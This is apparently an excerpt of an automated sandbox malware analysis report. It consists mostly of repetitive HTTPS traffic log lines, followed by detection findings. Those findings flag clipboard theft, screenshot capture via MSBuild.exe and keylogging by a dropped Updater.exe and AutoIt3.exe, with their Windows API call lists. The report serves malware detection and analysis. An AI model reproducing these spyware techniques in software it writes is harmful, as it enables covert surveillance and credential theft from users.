Source: unknown Network traffic detected: HTTP traffic on port 57775 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57917 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57951 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57787 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57953 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57976 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57918 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57985 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57847 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57929 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57755 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57776 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57858 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57907 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57997 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57859 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57941 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57881 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57964 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57765 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57870 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57975 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57986 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57927
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57926
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57929
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57928
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57923
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57801
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57922
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57925
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57924
Source: unknown Network traffic detected: HTTP traffic on port 57754 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57777 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57800
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57921
Source: unknown Network traffic detected: HTTP traffic on port 57811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57857 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57834 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57937 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57914 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57938
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57937
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57818
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57939
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57813
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57934
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57933
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57815
Source: unknown Network traffic detected: HTTP traffic on port 57960 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57814
Source: unknown Network traffic detected: HTTP traffic on port 57925 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57935
Source: unknown Network traffic detected: HTTP traffic on port 57868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57930
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57932
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57810
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57931
Source: unknown Network traffic detected: HTTP traffic on port 57731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57995 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57892 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57949
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57948
Source: unknown Network traffic detected: HTTP traffic on port 57959 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57984 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57829
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57945
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57944
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57825
Source: unknown Network traffic detected: HTTP traffic on port 57926 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57946
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57820
Source: unknown Network traffic detected: HTTP traffic on port 57903 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57941
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57940
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57943
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57821
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57942
Source: unknown Network traffic detected: HTTP traffic on port 57753 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57950
Source: unknown Network traffic detected: HTTP traffic on port 57730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57971 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57891 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57718
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57839
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57717
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57959
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57714
Source: unknown Network traffic detected: HTTP traffic on port 57948 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57956
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57834
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57955
Source: unknown Network traffic detected: HTTP traffic on port 57719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57837
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57958
Source: unknown Network traffic detected: HTTP traffic on port 57996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57715
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57836
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57957
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57952
Source: unknown Network traffic detected: HTTP traffic on port 57778 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57951
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57712
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57833
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57954
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57953
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57840
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57961
Source: unknown Network traffic detected: HTTP traffic on port 57810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57960
Source: unknown Network traffic detected: HTTP traffic on port 57880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57982 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57867 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57973 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57950 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57904 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57752 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57915 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57879 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57908
Source: unknown Network traffic detected: HTTP traffic on port 57800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57905
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57904
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57907
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57906
Source: unknown Network traffic detected: HTTP traffic on port 57949 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57901
Source: unknown Network traffic detected: HTTP traffic on port 57961 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57900
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57903
Source: unknown Network traffic detected: HTTP traffic on port 57718 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57902
Source: unknown Network traffic detected: HTTP traffic on port 57779 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57919
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57916
Source: unknown Network traffic detected: HTTP traffic on port 57927 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57915
Source: unknown Network traffic detected: HTTP traffic on port 57845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57918
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57917
Source: unknown Network traffic detected: HTTP traffic on port 57983 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57912
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57911
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57914
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57913
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57910
Source: unknown Network traffic detected: HTTP traffic on port 57856 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57938 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57972 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57768 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57739 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57957 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57769
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57768
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57889
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57765
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57886
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57764
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57885
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57888
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57766
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57887
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57772
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57771
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57892
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57774
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57895
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57773
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57894
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57770
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57891
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57890
Source: unknown Network traffic detected: HTTP traffic on port 57992 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57780 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57981 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57843 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57889 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57900 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57779
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57776
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57897
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57775
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57896
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57778
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57899
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57777
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57898
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57782
Source: unknown Network traffic detected: HTTP traffic on port 57728 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57784
Source: unknown Network traffic detected: HTTP traffic on port 57946 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57781
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57780
Source: unknown Network traffic detected: HTTP traffic on port 57854 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57911 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57787
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57789
Source: unknown Network traffic detected: HTTP traffic on port 57888 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57788
Source: unknown Network traffic detected: HTTP traffic on port 57727 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57790
Source: unknown Network traffic detected: HTTP traffic on port 57807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57855 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57945 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57792
Source: unknown Network traffic detected: HTTP traffic on port 57968 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57791
Source: unknown Network traffic detected: HTTP traffic on port 57769 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57912 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57923 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57866 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57797
Source: unknown Network traffic detected: HTTP traffic on port 57792 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57799
Source: unknown Network traffic detected: HTTP traffic on port 57750 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57993 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57877 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57934 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57781 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57729
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57728
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57849
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57725
Source: unknown Network traffic detected: HTTP traffic on port 57770 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57924 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57967
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57724
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57845
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57966
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57727
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57848
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57969
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57726
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57847
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57968
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57842
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57720
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57841
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57962
Source: unknown Network traffic detected: HTTP traffic on port 57793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57965
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57722
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57843
Source: unknown Network traffic detected: HTTP traffic on port 57901 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57964
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57970
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57730
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57851
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57972
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57850
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57971
Source: unknown Network traffic detected: HTTP traffic on port 57809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57841 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57876 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57761 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57899 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57857
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57978
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57735
Source: unknown Network traffic detected: HTTP traffic on port 57830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57856
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57977
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57738
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57859
Source: unknown Network traffic detected: HTTP traffic on port 57864 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57858
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57732
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57974
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57731
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57973
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57734
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57855
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57976
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57854
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57975
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57860
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57981
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57980
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57983
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57861
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57982
Source: unknown Network traffic detected: HTTP traffic on port 57970 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57991 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57749 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57980 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57842 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57747
Source: unknown Network traffic detected: HTTP traffic on port 57865 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57868
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57989
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57746
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57867
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57988
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57749
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57864
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57985
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57863
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57984
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57745
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57866
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57987
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57865
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57986
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57750
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57871
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57992
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57870
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57991
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57752
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57873
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57872
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57993
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57990
Source: unknown Network traffic detected: HTTP traffic on port 57782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57935 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57715 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57958 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57758
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57879
Source: unknown HTTPS traffic detected: 13.107.246.51:443 -> 192.168.2.4:57712 version: TLS 1.2
Contains functionality for read data from the clipboard
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0074F664 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 35_2_0074F664
Contains functionality to modify clipboard data
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0074F8D3 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 35_2_0074F8D3
Source: C:\edgheaa\AutoIt3.exe Code function: 38_2_00CEF8D3 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 38_2_00CEF8D3
Contains functionality to read the clipboard data
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0074F664 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 35_2_0074F664
Contains functionality to record screenshots
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 41_2_004064C0 RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegSetValueExA,RegCloseKey,RegOpenKeyExA,RegQueryInfoKeyW,RegEnumValueA,RegCloseKey,GdiplusStartup,GetDC,RegGetValueA,RegGetValueA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,RegGetValueA,GetSystemMetrics,GetSystemMetrics,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GdipCreateBitmapFromHBITMAP,GdipGetImageEncodersSize,GdipGetImageEncoders,GdipSaveImageToFile,SelectObject,DeleteObject,DeleteObject,DeleteObject,ReleaseDC,GdipDisposeImage,GdiplusShutdown,GetUserNameA,LookupAccountNameA,GetSidIdentifierAuthority,GetSidSubAuthorityCount,GetSidSubAuthority,GetSidSubAuthority, 41_2_004064C0
Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_0073AA95 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState, 35_2_0073AA95
Potential key logger detected (key state polling based)
Source: C:\Users\user\AppData\Local\friend\Updater.exe Code function: 35_2_00769FB4 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 35_2_00769FB4
